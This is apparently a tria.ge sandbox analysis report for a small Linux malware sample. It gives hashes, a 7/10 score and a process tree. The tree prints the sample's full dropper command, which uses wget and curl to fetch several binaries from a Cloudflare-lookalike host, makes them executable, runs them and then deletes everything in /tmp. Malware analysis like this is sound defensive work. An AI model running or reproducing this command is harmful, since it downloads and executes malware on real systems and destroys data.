Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

d318e9f208...f56374

ubuntu-18.04-amd64

7

Analysis

  • max time kernel
    148s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    25/12/2024, 13:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374

  • Size

    1KB

  • MD5

    6b13e69cc37757b1f2dbc2a1c8f806f1

  • SHA1

    01364dc40e5f1005fd7cd6e087368d64b35896f7

  • SHA256

    d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374

  • SHA512

    c46a38378e024c06251f3aa61a35a2e31f2e6a17da1284d100d78de0708a1e0852b10da74d59ec888e374a3ed8c0533851e46410d0df48da901b151b086ffdab

Score
7/10
defense_evasion

Malware Config

Signatures

Processes

  • /tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
    /tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
    1⤵
      PID:1503
    • /bin/sh
      /bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/; chmod 777 /var/tmp/incbit; curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit; chmod 777 /var/tmp/incbit; cd /var/tmp; ./incbit; cd /var/tmp; rm incbit; wget -nc http://dash.cloudflare.ovh/mvt/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://dash.cloudflare.ovh/mvt/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://dash.cloudflare.ovh/mvt/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://dash.cloudflare.ovh/mvt/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://dash.cloudflare.ovh/mvt/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://dash.cloudflare.ovh/mvt/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://dash.cloudflare.ovh/mvt/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://dash.cloudflare.ovh/mvt/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"
      1⤵
      • File and Directory Permissions Modification
      PID:1503
      • /usr/bin/wget
        wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/
        2⤵
          PID:1504
        • /bin/chmod
          chmod 777 /var/tmp/incbit
          2⤵
          • File and Directory Permissions Modification
          PID:1505
        • /usr/bin/curl
          curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit
          2⤵
            PID:1506

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads